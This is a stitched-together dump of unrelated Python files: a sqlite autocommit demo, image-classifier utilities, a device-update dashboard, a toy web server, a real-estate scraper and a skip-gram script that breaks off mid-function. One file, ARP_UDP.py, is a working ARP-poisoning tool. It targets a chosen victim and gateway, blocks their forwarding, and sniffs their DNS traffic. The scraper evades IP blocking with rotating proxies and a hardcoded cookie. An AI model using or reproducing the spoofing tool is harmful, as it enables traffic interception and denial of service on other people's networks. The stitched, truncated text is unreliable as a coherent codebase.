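    # Note (descriptive comment added for readability): the operation dicts produced by
    # SubdocHelper.build_sequence_operations / build_concurrent_operations are consumed
    # above through these keys: "subdoc_api_function_applied" (the name of one of the
    # DOC/SUBDOC command methods on this class), "data_value" (the value passed to that
    # method), "new_path_impacted_after_mutation_operation" (the subdoc path), and
    # "mutated_data_set" (the expected JSON document after the mutation).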
|
sqlite3_autocommit.py
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2010 Doug Hellmann. All rights reserved.
#
"""Illustrate the effect of autocommit mode.
"""
#end_pymotw_header
import logging
import sqlite3
import sys
import threading
import time
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s (%(threadName)-10s) %(message)s',
)
db_filename = 'todo.db'
isolation_level = None # autocommit mode
def writer():
my_name = threading.currentThread().name
with sqlite3.connect(db_filename,
isolation_level=isolation_level) as conn:
cursor = conn.cursor()
cursor.execute('update task set priority = priority + 1')
logging.debug('waiting to synchronize')
ready.wait() # synchronize threads
logging.debug('PAUSING')
time.sleep(1)
return
def reader():
my_name = threading.currentThread().name
with sqlite3.connect(db_filename,
isolation_level=isolation_level) as conn:
cursor = conn.cursor()
logging.debug('waiting to synchronize')
ready.wait() # synchronize threads
logging.debug('wait over')
cursor.execute('select * from task')
logging.debug('SELECT EXECUTED')
results = cursor.fetchall()
logging.debug('results fetched')
return
if __name__ == '__main__':
ready = threading.Event()
threads = [
threading.Thread(name='Reader 1', target=reader),
threading.Thread(name='Reader 2', target=reader),
threading.Thread(name='Writer 1', target=writer),
threading.Thread(name='Writer 2', target=writer),
]
[ t.start() for t in threads ]
time.sleep(1)
logging.debug('setting ready')
ready.set()
[ t.join() for t in threads ]
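# Note (added, not part of the original example): because isolation_level is None the
# UPDATE statements are committed as soon as they execute, so the readers' SELECTs
# return immediately. With the default deferred isolation the readers would instead
# block until the writers commit or their connections are closed.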
|
ARP_UDP.py
|
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import threading
import os
import sys
import textwrap
from termcolor import colored
os.system("clear")
print("""
____ ___________ __________
| | \______ ______ )
| | /| | \| ___)
| | / | ` \ |
|______/ /_______ /____|
\/
""")
os.system('echo 0 > /proc/sys/net/ipv4/ip_forward')
VIP = input("\nVictim: ")
GW = input("Gateway: ")
IFACE = input("Interface: ")
str(GW)
str(VIP)
str(IFACE)
def pkthandler(pkt):
    try:
        ip = pkt[IP]
    except IndexError:
        # no IP layer in this packet, nothing to report
        return
    src = ip.src
    dst = ip.dst
if pkt.haslayer(UDP):
udp = pkt[UDP]
print("--------------------------------------------------------\n\n")
print(" .:{}:. ".format(colored('UDP','red')))
print(" ")
print(" \033[1;36mSource IP:\033[00m {} \033[1;36mDestination IP:\033[00m {}".format(src, dst))
print(" \033[1;36mSource Port:\033[00m {} \033[1;36mDestination Port:\033[00m {}".format(udp.sport, udp.dport))
print(" \033[1;36mLength:\033[00m {} ".format(udp.len))
print(" \033[1;36mChecksum:\033[00m {} ".format(udp.chksum))
rawLoad = pkt.getlayer(Raw)
        if rawLoad is not None:
            print(" \033[1;36mRaw:\n\n\033[00m {} ".format(rawLoad))
print(" ")
print(" ")
hexdump(pkt)
def v_poison():
v = ARP(pdst=VIP, psrc=GW,)
while True:
try:
send(v,verbose=0,inter=1,loop=1)
        except KeyboardInterrupt: # Functions constructing and sending the ARP packets
sys.exit(1)
def gw_poison():
gw = ARP(pdst=GW, psrc=VIP)
while True:
try:
send(gw,verbose=0,inter=1,loop=1)
        except KeyboardInterrupt:
sys.exit(1)
def format_muti_lines(prefix, string, size=80):
size -= len(prefix)
if isinstance(string, bytes):
string = ''.join(r'\x{:02x}'.format(byte) for byte in string)
if size % 2:
size -= 1
return '\n'.join([prefix + line for line in textwrap.wrap(string, size)])
vthread = []
gwthread = []
while True: # Threads
vpoison = threading.Thread(target=v_poison)
    vpoison.daemon = True
vthread.append(vpoison)
vpoison.start()
gwpoison = threading.Thread(target=gw_poison)
    gwpoison.daemon = True
gwthread.append(gwpoison)
gwpoison.start()
try:
pkt = sniff(iface=str(IFACE),filter='udp port 53',prn=pkthandler)
except KeyboardInterrupt:
os.system("{ cd ..; python3 net.py; }")
exit(0)
if __name__ == "__main__":
    pass  # the packet capture and ARP poisoning above already run at import time
|
cnn_utility_functions.py
|
#!/usr/bin/python
# PROGRAMMER: Luke Wilson
# DATE CREATED: 2021-10-12
# REVISED DATE: 2021-01-01
# PURPOSE: Provide utility functions for import into main
# - u1_get_input_args()
# - u2_load_processed_data(data_dir)
# - u3_process_data(transform_request)
# - u4_data_iterator(dict_datasets)
# - u5_time_limited_input(prompt, default=True)
# - u6_user_input_prompt(prompt, default)
##
# Import libraries
import json
import argparse
import os, random
import numpy as np
import torch
import torch.nn.functional as F
from torchvision import transforms, datasets, models
from torch import nn, optim
from PIL import Image
from threading import Thread
def u1_get_input_args():
'''
Purpose:
- Creates and stores command line arguments inputted by the user.
- Attaches default arguments and help text to aid user.
Command Line Arguments:
1. Data directory as --dir
2. Choose to load model as --load
3. Choose to train model as --train
4. Define number of training epochs as --epoch
5. Define network number of hidden layers --layer
6. Define learnrate as --learn
7. Choose pretrained CNN model as --model
Returns:
- Stored command line arguments as an Argument Parser Object with parse_args() data structure
'''
parser = argparse.ArgumentParser(description = 'Classify input images and benchmark performance')
parser.add_argument('--dir', type=str, default= 'Flower_data', help='input path for data directory')
parser.add_argument('--load', type=str, default='n', help='yes \'y\' or no \'n\' to load state_dict for model', choices=['y','n'])
parser.add_argument('--train', type=str, default='n', help='yes \'y\' or no \'n\' to retrain this model', choices=['y','n'])
    parser.add_argument('--epoch', type=int, default=50, help='provide the number of epochs for training (default 50)')
parser.add_argument('--layer', type=int, default=2, help='provide the number of hidden layers to use (default 2)')
    parser.add_argument('--learn', type=float, default=0.003, help='provide the learning rate to begin training (default 0.003)')
parser.add_argument('--model', type=str, default='googlenet', help='select pretrained model',
choices=['vgg', 'alexnet', 'googlenet', 'densenet', 'resnext', 'shufflenet'])
return parser.parse_args()
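# Example invocation (illustrative only; the script name "main.py" is an assumption,
# the flags match the arguments defined above). Note that u2_load_processed_data
# concatenates paths directly, so --dir should end with a '/':
#   python main.py --dir Flower_data/ --load n --train y --epoch 50 --model googlenet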
def u2_load_processed_data(data_dir):
'''
Purpose:
- Access data directory and produce a dictionary of datasets
- Create a dictionary of the class labels and read in the data labels
Parameters:
- data_dir = pathway to the data
Returns:
- dictionary of datasets
- dictionary of data labels
- dictionary of class labels
'''
# Initialize empty dictionaries to hold data and data labels
dict_datasets = {}
dict_data_labels = {}
# Iterate through folders in the data directory
for folder in os.listdir(data_dir):
# If data exists, create datasets for overfitting, testing, training, and validating data
if folder in ['overfit', 'test', 'train', 'valid']:
dict_datasets[folder + '_data'] = datasets.ImageFolder(data_dir + folder, transform=u3_process_data(folder))
# If data for inference exists, create a dataset from the predict folder
if folder == 'predict':
predict_transform = u3_process_data(folder)
dict_datasets['predict_data'] = [(predict_transform(Image.open(data_dir + folder + '/' + filename)),
filename) for filename in os.listdir(data_dir + folder)]
        # If data labels are provided in the data directory as a json file, open it and read it into the data label dictionary
if os.path.splitext(folder)[1] == '.json':
with open(data_dir + folder, 'r') as f:
dict_data_labels = json.load(f)
# Create a dictionary connecting class indexes to class labels, return the datasets and label dictionaries
dict_class_labels = {value : key for (key, value) in dict_datasets['train_data'].class_to_idx.items()}
return dict_datasets, dict_data_labels, dict_class_labels
def u3_process_data(transform_request):
'''
Purpose:
- Define an assortment of transforms for application to specific datasets
- Return the appropriate transformation that corresponds to the inputted request
- Defined transforms are composed of a sequence of individual transform operations
- Depending on the needs of each data set, a transform will use specific operations
Parameters:
- transformation_request = selected transformation type
Returns:
- transform that corresponds to the request
'''
image_1d_size = 224
predict_transform = transforms.Compose([transforms.Resize(int(np.round_(image_1d_size*1.1, decimals=0))),
transforms.CenterCrop(image_1d_size),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
inverse_transform = transforms.Compose([transforms.Normalize([0, 0, 0], [1/0.229, 1/0.224, 1/0.225]),
transforms.Normalize([-0.485, -0.456, -0.406], [1, 1, 1])])
train_transform = transforms.Compose([transforms.RandomRotation(20),
transforms.RandomResizedCrop(image_1d_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],[0.229, 0.224, 0.225])])
valid_transform = transforms.Compose([transforms.Resize(int(np.round_(image_1d_size*1.1, decimals=0))),
transforms.CenterCrop(image_1d_size),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
test_transform = transforms.Compose([transforms.Resize(int(np.round_(image_1d_size*1.1, decimals=0))),
transforms.CenterCrop(image_1d_size),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
game_transform = transforms.Compose([transforms.Resize(int(np.round_(image_1d_size*1.1, decimals=0))),
transforms.CenterCrop(image_1d_size),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
overfit_transform = train_transform
return locals()[transform_request + '_transform']
def u4_data_iterator(dict_datasets):
'''
Purpose:
- Receive a dictionary of datasets
- Convert each dataset to a dataLoader
- Return a dictionary of dataloaders
Parameters:
- dict_datasets = dictionary of datasets
Returns:
- dict_data_loaders = dictionary of dataloaders
'''
dict_data_loaders = {}
for dataset in dict_datasets:
loader_type = dataset.split('_')[0] + '_loader'
dict_data_loaders[loader_type] = torch.utils.data.DataLoader(dict_datasets[dataset], batch_size=128, shuffle=True)
return dict_data_loaders
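# Illustrative sketch only (defined here but never called): shows how u2, u3 and u4 are
# meant to compose. The 'Flower_data/' path is an assumption; any directory containing
# train/valid/test subfolders (and optionally a *.json label file) should work.
def _demo_data_pipeline(data_dir='Flower_data/'):
    dict_datasets, dict_data_labels, dict_class_labels = u2_load_processed_data(data_dir)
    dict_data_loaders = u4_data_iterator(dict_datasets)
    for images, labels in dict_data_loaders['train_loader']:
        # each batch is a tensor of shape [batch_size, 3, 224, 224] plus integer class labels
        print(images.shape, labels.shape)
        break
    return dict_data_loaders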
def u5_time_limited_input(prompt, default=True):
'''
Purpose:
- Receive text and start a thread to initiate a user input prompt with that text
- Track thread time and limit time to an established TIMEOUT limit
- Return user input or after the TIMEOUT limit is reached return the default choice
Parameters:
- prompt = specific question text for display
- default = default choice if no user input is provided
Returns:
- choice = the user input or the default
'''
TIMEOUT = 10
prompt = prompt + f': \'y\' for yes, \'n\' for no ({TIMEOUT} seconds to choose): '
user_input_thread = Thread(target=u6_user_input_prompt, args=(prompt, default), daemon = True)
user_input_thread.start() # Start the thread, calling the user input function
user_input_thread.join(TIMEOUT) # Limit the thread to the TIMEOUT time limit
if not answered:
print('\n No valid input, proceeding with operation...\n')
return choice
def u6_user_input_prompt(prompt, default):
'''
Purpose:
- Receive a prompt and use it for user input prompting
- Once answered return True or False if input is yes or no
- Ask question again if the input is incorrect
Parameters:
- prompt = complete user input question text for display
- default = default choice if no user input is provided
Returns:
- choice = the user input or the default
'''
global choice, answered # Global variables are required to communicate input statuses back to the thread manager
choice = default
answered = False
while not answered:
choice = input(prompt)
if choice == 'Y' or choice == 'y':
print('User input = Yes\n')
choice = True
answered = True
elif choice == 'N' or choice == 'n':
choice = False
answered = True
print('User input = No\n')
        else:
            print('Error, please use the character inputs \'Y\' and \'N\'')
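# Minimal manual check (illustrative addition, not part of the training flow): running
# this module directly exercises the time-limited prompt; the question text is made up.
if __name__ == '__main__':
    retrain = u5_time_limited_input('Retrain the model')
    print('choice returned:', retrain)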
|
main.py
|
from argparse import ArgumentParser
import logging
import os
import sys
from threading import Thread
from time import sleep
from bottle import error, redirect, request, response, route, run, template
from requests import HTTPError
from fiodash.aklite import AkliteClient
from fiodash.templates import INDEX_TPL
logging.basicConfig(level="INFO", format="%(asctime)s %(levelname)s: %(message)s")
log = logging.getLogger()
logging.getLogger("requests").setLevel(logging.WARNING)
client = AkliteClient()
SINGLE_APP = os.environ.get("FIODASH_SINGLE_APP")
@error(500)
def error500(error):
if isinstance(error.exception, HTTPError):
r = error.exception.response
return f"HTTP_{r.status_code}: {r.text}"
return str(error.exception)
@route("/")
def index():
uuid, name = client.get_uuid_and_name()
current = client.get_current()
latest = client.targets()[-1]
update_available = None
client.refresh_config()
configured_apps = client.configured_apps
apps = []
for app in current.apps:
apps.append({"name": app, "enabled": app in configured_apps})
return template(
INDEX_TPL,
name=name,
uuid=uuid,
current_target=current,
latest=latest,
apps=apps,
single_app=SINGLE_APP,
)
@route("/update-apps", method="POST")
def update_apps():
apps = []
request_apps = request.json["apps"]
for app in client.get_current().apps:
if app in request_apps:
apps.append(app)
if set(apps) != set(client.configured_apps):
log.info("Enabling apps: %s", apps)
client.set_apps(apps)
redirect("/")
@route("/update-target", method="POST")
def update_target():
current = client.get_current()
latest = client.targets()[-1]
log.info("Latest target is %s", latest)
if current.name != latest.name:
log.info("Downloading target")
correlation_id = latest.generate_correlation_id()
reason = f"Upgrading from {current.name} to {latest.name}"
client.download(latest.name, correlation_id, reason)
log.info("Installing target")
if client.install(latest.name, correlation_id):
response.status = 202
def sleep_reboot():
sleep(2)
client.reboot()
Thread(target=sleep_reboot).start()
return ""
def webapp(args):
run(host=args.host, port=args.port, debug=args.debug, reloader=args.debug)
def list_targets(args):
for t in client.targets():
print("# Target version", t.version)
print("\tname: ", t.name)
print("\tostree sha:", t.sha256)
print("\tapps:")
for name, app in t.apps.items():
print("\t\t", name, "\t", app.uri)
print()
def install_target(args):
current = client.get_current()
targets = client.targets()
tgt = targets[-1]
if args.target_version:
for t in targets:
if t.version == args.target_version:
tgt = t
break
else:
sys.exit("Target version not found")
log.info("Downloading %s", tgt.name)
correlation_id = tgt.generate_correlation_id()
reason = f"Upgrading from {current.name} to {tgt.name}"
client.download(tgt.name, correlation_id, reason)
log.info("Installing %s", tgt)
if client.install(tgt.name, correlation_id):
client.reboot()
def set_apps(args):
client.set_apps(args.app)
def status(args):
uuid, name = client.get_uuid_and_name()
print("# Device UUID:", uuid)
print("# Device Name:", name)
t = client.get_current()
configured_apps = client.configured_apps
print("# Target version", t.version)
print("\tname: ", t.name)
print("\tostree sha:", t.sha256)
print("\tapps: (* = running)")
for name, app in t.apps.items():
val = "*" if name in configured_apps else " "
print("\t\t", val, name, "\t", app.uri)
def _get_parser():
parser = ArgumentParser(description="fiodash web app")
sub = parser.add_subparsers(help="sub-command help")
p = sub.add_parser("serve", help="Run as a web app")
p.set_defaults(func=webapp)
p.add_argument(
"--host", default="0.0.0.0", help="Host to bind to. Default=%(default)s",
)
p.add_argument(
"--port", type=int, default=8080, help="Port to bind to. Default=%(default)s",
)
p.add_argument(
"--debug", action="store_true", help="Run in debug mode",
)
p = sub.add_parser("list", help="List available targets")
p.set_defaults(func=list_targets)
p = sub.add_parser("set-apps", help="Set apps to run on target")
p.set_defaults(func=set_apps)
p.add_argument("app", nargs="*")
p = sub.add_parser("install", help="Install target")
p.set_defaults(func=install_target)
p.add_argument(
"--target-version",
"-t",
type=int,
help="Target version. Default is latest Target",
)
p = sub.add_parser("status", help="Show current status")
p.set_defaults(func=status)
return parser
def main():
parser = _get_parser()
args = parser.parse_args()
client.refresh_config()
client.send_telemetry()
if getattr(args, "func", None):
args.func(args)
else:
parser.print_help(sys.stderr)
sys.exit(1)
if __name__ == "__main__":
main()
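# Example invocations (hypothetical script name and values, shown for illustration only):
#
#   python3 fiodash.py serve --host 0.0.0.0 --port 8080
#   python3 fiodash.py list
#   python3 fiodash.py set-apps app1 app2
#   python3 fiodash.py install --target-version 42
#   python3 fiodash.py status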
|
web_server.py
|
import socket
import re
import multiprocessing
import time
# import dynamic.mini_frame
import sys
class WSGIServer(object):
def __init__(self, port, app, static_path):
# 1. Create the socket
self.tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.tcp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 2. Bind to the given port
self.tcp_server_socket.bind(("", port))
# 3. Turn it into a listening socket
self.tcp_server_socket.listen(128)
self.application = app
self.static_path = static_path
def service_client(self, new_socket):
"""为这个客户端返回数据"""
# 1. 接收浏览器发送过来的请求 ,即http请求
# GET / HTTP/1.1
# .....
request = new_socket.recv(1024).decode("utf-8")
# print(">>>"*50)
# print(request)
request_lines = request.splitlines()
print("")
print(">"*20)
print(request_lines)
# GET /index.html HTTP/1.1
# get post put del
file_name = ""
ret = re.match(r"[^/]+(/[^ ]*)", request_lines[0])
if ret:
file_name = ret.group(1)
# print("*"*50, file_name)
if file_name == "/":
file_name = "/index.html"
# 2. Return HTTP-formatted data to the browser
# 2.1 If the requested resource does not end in .html, treat it as a static resource (css/js/png/jpg, etc.)
if not file_name.endswith(".html"):
try:
f = open(self.static_path + file_name, "rb")
except:
response = "HTTP/1.1 404 NOT FOUND\r\n"
response += "\r\n"
response += "------file not found-----"
new_socket.send(response.encode("utf-8"))
else:
html_content = f.read()
f.close()
# 2.1 Prepare the data to send to the browser --- header
response = "HTTP/1.1 200 OK\r\n"
response += "\r\n"
# 2.2 Prepare the data to send to the browser --- body
# response += "hahahhah"
# Send the response header to the browser
new_socket.send(response.encode("utf-8"))
# Send the response body to the browser
new_socket.send(html_content)
else:
# 2.2 If it ends in .html, treat it as a request for a dynamic resource
env = dict()  # This dict holds the data the web server passes to the web framework
env['PATH_INFO'] = file_name
# {"PATH_INFO": "/index.py"}
# body = dynamic.mini_frame.application(env, self.set_response_header)
body = self.application(env, self.set_response_header)
header = "HTTP/1.1 %s\r\n" % self.status
for temp in self.headers:
header += "%s:%s\r\n" % (temp[0], temp[1])
header += "\r\n"
response = header+body
# Send the response to the browser
new_socket.send(response.encode("utf-8"))
# Close the socket
new_socket.close()
def set_response_header(self, status, headers):
self.status = status
self.headers = [("server", "mini_web v8.8")]
self.headers += headers
def run_forever(self):
"""用来完成整体的控制"""
while True:
# 4. 等待新客户端的链接
new_socket, client_addr = self.tcp_server_socket.accept()
# 5. 为这个客户端服务
p = multiprocessing.Process(target=self.service_client, args=(new_socket,))
p.start()
new_socket.close()
# 关闭监听套接字
self.tcp_server_socket.close()
def main():
"""控制整体,创建一个web 服务器对象,然后调用这个对象的run_forever方法运行"""
if len(sys.argv) == 3:
try:
port = int(sys.argv[1]) # 7890
frame_app_name = sys.argv[2] # mini_frame:application
except Exception as ret:
print("端口输入错误。。。。。")
return
else:
print("请按照以下方式运行:")
print("python3 xxxx.py 7890 mini_frame:application")
return
# mini_frame:application
ret = re.match(r"([^:]+):(.*)", frame_app_name)
if ret:
frame_name = ret.group(1) # mini_frame
app_name = ret.group(2) # application
else:
print("请按照以下方式运行:")
print("python3 xxxx.py 7890 mini_frame:application")
return
with open("./web_server.conf") as f:
conf_info = eval(f.read())
# conf_info is now a dict with contents like:
# {
# "static_path":"./static",
# "dynamic_path":"./dynamic"
# }
sys.path.append(conf_info["dynamic_path"])
# import frame_name ---> look for frame_name.py
frame = __import__(frame_name) # the return value refers to the imported module
app = getattr(frame, app_name) # app now points to the application function in the dynamic/mini_frame module
# print(app)
wsgi_server = WSGIServer(port, app, conf_info['static_path'])
wsgi_server.run_forever()
if __name__ == "__main__":
main()
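# Minimal sketch of a framework module this server can load (illustrative only;
# the real dynamic/mini_frame.py is not part of this file). The server calls the
# loaded callable with the env dict built above and its set_response_header method:
#
#     # dynamic/mini_frame.py
#     def application(env, start_response):
#         start_response("200 OK", [("Content-Type", "text/html;charset=utf-8")])
#         return "hello from mini_frame: " + env.get("PATH_INFO", "/")
#
# And an example web_server.conf matching the comments in main():
#
#     {
#         "static_path": "./static",
#         "dynamic_path": "./dynamic"
#     }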
|
misc.py
|
import requests
import random
from datetime import datetime
from bs4 import BeautifulSoup
import threading
from six.moves import urllib
import socket
hds = [{'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'},
{'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11'},
{'User-Agent': 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)'},
{'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0'},
{'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/44.0.2403.89 Chrome/44.0.2403.89 Safari/537.36'},
{'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50'},
{'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50'},
{'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'},
{'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'},
{'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'},
{'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11'},
{'User-Agent': 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11'},
{'User-Agent': 'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11'}]
hd = {
'Host': 'bj.lianjia.com',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Referer': 'http://captcha.lianjia.com/?redirect=http%3A%2F%2Fbj.lianjia.com%2Fxiaoqu%2Fxicheng%2F',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Cookie': 'lianjia_uuid=31746070-1dfd-441b-9dac-a762d90294a5; UM_distinctid=15b12d80b45179-0d64c7a3f6681e-1d396853-1fa400-15b12d80b46247; introduce=1; all-lj=c28812af28ef34a41ba2474a2b5c52c2; select_city=110000; _jzqx=1.1490669800.1491529315.3.jzqsr=captcha%2Elianjia%2Ecom|jzqct=/.jzqsr=captcha%2Elianjia%2Ecom|jzqct=/; _jzqckmp=1; CNZZDATA1253477573=1526314437-1490666871-http%253A%252F%252Fcaptcha.lianjia.com%252F%7C1491525581; _smt_uid=58d9d0e8.bf2821b; CNZZDATA1254525948=497550824-1490668493-http%253A%252F%252Fcaptcha.lianjia.com%252F%7C1491527170; CNZZDATA1255633284=1227338008-1490665030-http%253A%252F%252Fcaptcha.lianjia.com%252F%7C1491529075; CNZZDATA1255604082=1285546817-1490665213-http%253A%252F%252Fcaptcha.lianjia.com%252F%7C1491529283; _qzja=1.866324558.1490669800393.1490941575494.1491529315136.1491529677322.1491530677583.0.0.0.54.10; _qzjb=1.1491529315136.4.0.0.0; _qzjc=1; _qzjto=4.1.0; _jzqa=1.1305601964964521000.1490669800.1490941575.1491529315.10; _jzqc=1; _jzqb=1.4.10.1491529315.1; _gat=1; _gat_past=1; _gat_global=1; _gat_new_global=1; _ga=GA1.2.48956529.1490669802; _gat_dianpu_agent=1; lianjia_ssid=6fa2fc72-0887-4093-aab6-2345792b86d3'
}
def get_source_code(url):
try:
result = requests.get(
url, headers=hds[random.randint(0, len(hds) - 1)])
#result = requests.get(url)
source_code = result.content
except Exception as e:
print(e)
return
return source_code
def get_total_pages(url):
source_code = get_source_code(url)
soup = BeautifulSoup(source_code, 'lxml')
total_pages = 0
try:
page_info = soup.find('div', {'class': 'page-box house-lst-page-box'})
except AttributeError as e:
page_info = None
# if it does not get the total page count, return the default value 50
if page_info is None:
return 50
# '{"totalPage":5,"curPage":1}'
page_info_str = page_info.get('page-data').split(',')[0]
total_pages = int(page_info_str.split(':')[1])
return total_pages
def get_sh_total_pages(url):
source_code = get_source_code(url)
soup = BeautifulSoup(source_code, 'lxml')
total_pages = 0
try:
page_info = soup.find('a', {'gahref': 'results_totalpage'})
except AttributeError as e:
page_info = None
if page_info is None:
return 1
# <a href="/xiaoqu/putuo/d58" gahref="results_totalpage">58</a>
total_pages = int(page_info.get_text().strip())
return total_pages
# =========== proxy IP spider: not used for now because it is not stable ===========
proxys_src = []
proxys = []
def spider_proxyip():
try:
for i in range(1, 4):
url = 'http://www.xicidaili.com/nt/' + str(i)
req = requests.get(
url, headers=hds[random.randint(0, len(hds) - 1)])
source_code = req.content
soup = BeautifulSoup(source_code, 'lxml')
ips = soup.findAll('tr')
for x in range(1, len(ips)):
ip = ips[x]
tds = ip.findAll("td")
proxy_host = "http://" + \
tds[1].contents[0] + ":" + tds[2].contents[0]
proxy_temp = {"http": proxy_host}
proxys_src.append(proxy_temp)
except Exception as e:
print("spider_proxyip exception:")
print(e)
def test_proxyip_thread(i):
socket.setdefaulttimeout(5)
url = "http://bj.lianjia.com"
try:
proxy_support = urllib.request.ProxyHandler(proxys_src[i])
opener = urllib.request.build_opener(proxy_support)
urllib.request.install_opener(opener)
res = urllib.request.Request(
url, headers=hds[random.randint(0, len(hds) - 1)])
source_cod = urllib.request.urlopen(res, timeout=10).read()
if source_cod.find(b'\xe6\x82\xa8\xe6\x89\x80\xe5\x9c\xa8\xe7\x9a\x84IP') == -1:
proxys.append(proxys_src[i])
except Exception as e:
return
# print(e)
def test_proxyip():
print("proxys before:" + str(len(proxys_src)))
threads = []
try:
for i in range(len(proxys_src)):
thread = threading.Thread(target=test_proxyip_thread, args=[i])
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
except Exception as e:
print(e)
print("proxys after:" + str(len(proxys)))
def prepare_proxy():
spider_proxyip()
test_proxyip()
def readurl_by_proxy(url):
try:
tet = proxys[random.randint(0, len(proxys) - 1)]
proxy_support = urllib.request.ProxyHandler(tet)
opener = urllib.request.build_opener(proxy_support)
urllib.request.install_opener(opener)
req = urllib.request.Request(
url, headers=hds[random.randint(0, len(hds) - 1)])
source_code = urllib.request.urlopen(req, timeout=10).read()
if source_code.find(b'\xe6\x82\xa8\xe6\x89\x80\xe5\x9c\xa8\xe7\x9a\x84IP') != -1:
proxys.remove(tet)
print('proxys remove by IP traffic, new length is:' + str(len(proxys)))
return None
except Exception as e:
proxys.remove(tet)
print('proxys remove by exception:')
print(e)
print('proxys new length is:' + str(len(proxys)))
return None
return source_code
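# Usage sketch (illustrative; the URL below is an example, not defined in this module):
#
#     example_url = 'http://bj.lianjia.com/xiaoqu/'
#     print('total pages:', get_total_pages(example_url))
#     # Optional, less stable path: scrape a proxy pool first, then fetch through it.
#     prepare_proxy()
#     html = readurl_by_proxy(example_url)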
|
skipgram_item2vec.py
|
#!/usr/bin/env python3
# coding: utf-8
# File: (app)item2vector.py
# Author: maozida880
# Date: 21-01-18
import collections
import math
import random
import numpy as np
import tensorflow as tf
import common_io
import random
import queue
import time
import threading
tf.app.flags.DEFINE_string("tables", "初处理输入表,训练输入表 ", "初处理输入表:是一个用户的item index列表, [1 2 3 4 5];训练输入表:是初处理表变为pair对的表")
tf.app.flags.DEFINE_string("outputs", "初处理输出表", "初处理输出表就是训练输入表")
tf.app.flags.DEFINE_string("checkpointDir", "模型保存地址", "output info")
tf.app.flags.DEFINE_string("pairname", "训练输入表", "用于训练的输入表")
tf.app.flags.DEFINE_string("modelpath",'模型保存地址', "model,与checkpointDir一样,通道不同而已")
tf.app.flags.DEFINE_integer("lowfrequency", 100, "lowfrequency limit")
FLAGS = tf.app.flags.FLAGS
class SkipGram:
def __init__(self):
self.data_index = 0
self.tables = FLAGS.tables
self.output = FLAGS.outputs
# self.modelpath = FLAGS.checkpointDir
# input config
self.__input_init__()
self.min_count = FLAGS.lowfrequency # minimum word frequency for keeping a word in the vocabulary (here everything is kept)
self.batch_size = 2000 # number of samples drawn per training iteration
self.embedding_size = 128 # dimensionality of the generated word vectors
self.window_size = 5 # how many words before/after to consider (window size); skip-gram yields window_size*2 center-context pairs
self.num_sampled = 300 # number of negative samples
self.num_steps = 200000 # maximum number of iterations; create and set the default session, then start the actual training
self.vocabulary_size = 1000000
# self.words = self.read_data(self.dataset) # words are represented as one flat list
self.scheme = "all" # either "all" or "window"
self.pair_name = FLAGS.pairname
# make pair
self.__pair_init__()
#read data
# self.pair_list = self.readfile2list()
# self.length_pair_list = len(self.pair_list)
self.pair_list = []
self.queue_preline = queue.Queue(maxsize=1)
self.queue_readingstate = queue.Queue(maxsize=1)
def __input_init__(self):
tables_list = self.tables.split(",")
self.input_table = tables_list[0]
self.pair_table = tables_list[1]
self.output_table = self.output
self.modelpath = FLAGS.checkpointDir.split(",")[1]
self.output_path = FLAGS.checkpointDir.split(",")[0]
self.pair_file = self.output
self.dataset = self.input_fn() # list of sentences (each a list of item indices)
def __pair_init__(self):
#make data
print("2. build dataset")
# self.data, _, _, _ = self.build_dataset(self.words, self.min_count)
self.data = self.dataset
print("dataset is {}".format(self.dataset[0]))
print( "words count is {}".format(len(self.dataset)) )
self.pair_list = self.centerword_label_pair_generate(self.window_size,self.data,self.scheme)
#define the input
def input_fn(self):
print("1. reading data and make dictionary")
dataset = []
with common_io.table.TableReader(self.input_table) as f1:
cnt = f1.get_row_count()
cnt = 4800000
print("all need to read %d lines"%cnt)
for i in range(cnt):
